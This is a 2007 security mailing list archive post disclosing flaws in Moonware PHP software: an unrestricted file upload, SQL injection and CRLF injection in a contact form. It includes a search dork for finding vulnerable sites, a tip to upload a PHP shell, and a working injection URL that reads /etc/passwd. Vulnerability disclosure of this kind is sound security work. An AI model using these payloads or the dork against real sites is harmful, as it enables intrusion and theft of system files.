lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: 26 Aug 2007 03:40:36 -0000
Subject: Moonware Software Multiple Vulnerabilities

Moonware Software Multiple Vulnerabilities

by s0cratex
MSN: s0cratex[at]nasa[dot]gov

Moonware Homepage:

I. Moon Gallery
   ---- -------

Bug: Arbitrary file upload
Dork: "Powered by: Dale Mooney Gallery"


The file /config/upload.php don't have any restriction,
6:$target_path = $target_path . basename( $_FILES['uploadedfile']['name']); 		
8:if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {

U can upload a PHP Shell and found it in the subdir /images/

II. Calendar Events
    -------- ------

Bug: SQL Injections 

The variable $get is not verified in the file viewevent.php. (We need magic_quotes_gpc = Off)

8:$get = mysql_query("SELECT * FROM cal_events WHERE id = '$id'");
p0c: viewevent.php?id=-1' union select 1,load_file('/etc/passwd'),1,1/* 

III. Moonware Contact Form
     -------- ------- ----

Bug: CRLF Injection


File contact.php

line 26-35
	$to = $email;
	$subject = $_POST["subject"];
	$email = $_POST["email"];
	$message = $_POST["message"];
	$name = $_POST["name"];
	$datetime = date("D, d M Y H:i:s");
	$finalmessage = "Message from: $name \n Subject: $subject \n Email: $email \n Date Sent: $datetime \n Message:\n\n $message";

44:$sent = mail($to,$subject,$finalmessage);
The vars are not verified and i can insert \r\n...


Powered by blists - more mailing lists